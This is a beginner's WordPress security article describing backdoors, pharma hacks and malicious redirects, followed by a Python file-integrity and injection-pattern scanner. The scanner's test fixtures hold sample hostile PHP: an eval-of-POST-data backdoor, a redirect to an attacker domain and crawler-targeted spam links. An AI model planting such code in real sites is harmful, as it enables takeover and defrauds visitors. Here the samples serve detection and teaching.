WordPress runs 17% of websites worldwide, or more than 700 million websites (1). This makes it an extremely flexible and powerful tool for getting your website up and running; however, it also makes it a prime target for malicious attacks. No system is completely secure, and WordPress is certainly not an exception. My hope for this article is that it will provide a getting-started primer for making security improvements to your website.
We are going to cover:
But first, I am not a computer or website security expert, so these are best practices that I have learned from my experience in the WordPress community and by paying attention to articles such as the ones below. I want to make sure to give credit where it is due:
Smashing Magazine – Oct. 09, 2012 – Four Malware Infections in WordPress
Tuts Plus – Dec. 10, 2011 – 11 Quick Tips for Securing Your WordPress Site
WP Lift – Aug. 22, 2012 – Strengthening Login Security WordPress
The largest risk to your website is that someone gains access to your username and password. With this information, they will be able to take control and install whatever they want. Common hacks related to someone gaining access to your site include (1):
- Backdoors: This is the result of a hacker gaining access to your server files, database or WordPress admin. Your site could also be compromised if the hacker gets access to another site on your shared server. Once in, the hacker can carry out one of the following attacks or take over or take down your website.
- Drive-by Downloads: In this attack the hacker installs software on your website that shows your users a prompt telling them they have been hacked and need to install a security program (really a virus). The target here is your users, but your website is the vehicle.
- Pharma Hacks: Here the hacker takes over your site and injects spam links or content into it. This content is conditionally served to your users and to Google, risking your credibility and search ranking.
- Malicious Redirect: This is where the hacker simply redirects traffic from your site (myawesomesite.com) to their site (evilhackersite.com), so that users never make it to your site but are sent to a malicious one instead.
All of these hacks can be prevented, or at least made less likely, by making sure your WordPress core, plugins and themes are up to date and that you take frequent backups so you can recover if something should happen. They can also be caused by a poorly written theme or plugin that fails to prevent code injection, or by weak passwords used by your users.
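One practical way to notice the backdoor, pharma and redirect hacks described above is to keep a hash manifest of your site's files taken right after a clean install or update, then compare the live files against it and scan anything new or changed for the usual injection patterns. The script below is an added example, not code from the original article or from WordPress itself; the file contents, the baseline and the pattern list are constructed for illustration (the patterns are a starting point, not a complete signature set), and the file paths are hypothetical.

```python
"""Added example: baseline integrity check plus a scan of changed files for
injection patterns typical of backdoors, pharma hacks and malicious redirects.
Sample files are constructed in memory so the script runs offline."""
import hashlib
import re

# Constructed "known good" site: record this right after a clean install/update.
CLEAN_FILES = {
    "wp-config.php": "<?php define('DB_NAME', 'wp'); require_once ABSPATH . 'wp-settings.php';",
    "wp-content/themes/mytheme/functions.php": "<?php add_action('wp_head', 'mytheme_head');",
    "wp-content/themes/mytheme/header.php": "<!DOCTYPE html><html><head><?php wp_head(); ?></head>",
}

# Constructed snapshot of the same site after a compromise.
CURRENT_FILES = dict(CLEAN_FILES)
# Pharma hack: spam link shown only to search-engine crawlers.
CURRENT_FILES["wp-content/themes/mytheme/header.php"] = (
    "<!DOCTYPE html><html><head><?php wp_head(); ?>"
    "<?php if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {"
    " echo '<a href=\"http://example.invalid/pills\">cheap pills</a>'; } ?></head>"
)
# Malicious redirect: every visitor is bounced to the attacker's domain.
CURRENT_FILES["wp-content/themes/mytheme/functions.php"] = (
    "<?php add_action('wp_head', 'mytheme_head'); "
    + 'header("Location: http://evilhackersite.com/"); exit;'
)
# Backdoor: a PHP file dropped into the uploads directory that executes POST data.
CURRENT_FILES["wp-content/uploads/cache.php"] = "<?php eval(base64_decode($_POST['c'])); ?>"

# (finding name, regex) pairs; hypothetical starter list, extend for your site.
PATTERNS = [
    ("eval of decoded payload (backdoor)",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)")),
    ("request data executed or included",
     re.compile(r"(eval|include|require|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)")),
    ("redirect to external host",
     re.compile(r"header\s*\(\s*['\"]Location:\s*https?://")),
    ("crawler-conditional content (pharma hack)",
     re.compile(r"HTTP_USER_AGENT.{0,80}(Googlebot|bingbot)", re.S)),
]


def sha256(text):
    """Hash file content; the manifest stores only these digests."""
    return hashlib.sha256(text.encode()).hexdigest()


def manifest(files):
    """Map path -> sha256 for every file in the snapshot."""
    return {path: sha256(content) for path, content in files.items()}


def compare(baseline, current):
    """Classify paths as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def scan(path, content):
    """Return the names of every suspicious pattern found in one file."""
    findings = [name for name, rx in PATTERNS if rx.search(content)]
    # PHP should never live under uploads; the web server should not execute it there.
    if path.startswith("wp-content/uploads/") and path.endswith(".php"):
        findings.append("php file in uploads directory")
    return findings


def audit(baseline_files, current_files):
    """Full run: diff against the baseline, scan added/modified files.
    Returns {path: (status, [findings])}; unchanged files are omitted."""
    changes = compare(manifest(baseline_files), manifest(current_files))
    report = {}
    for status in ("added", "modified"):
        for path in changes[status]:
            report[path] = (status, scan(path, current_files[path]))
    for path in changes["removed"]:
        report[path] = ("removed", [])
    return report


if __name__ == "__main__":
    for path, (status, findings) in audit(CLEAN_FILES, CURRENT_FILES).items():
        print(f"{status:9} {path}  {'; '.join(findings) or '-'}")
```

On a real site you would build `CLEAN_FILES` by walking the document root and store the manifest somewhere the web server cannot write to, then rerun the audit from cron and after every update; anything reported as added or modified that you did not change yourself is worth restoring from your last clean backup rather than editing in place.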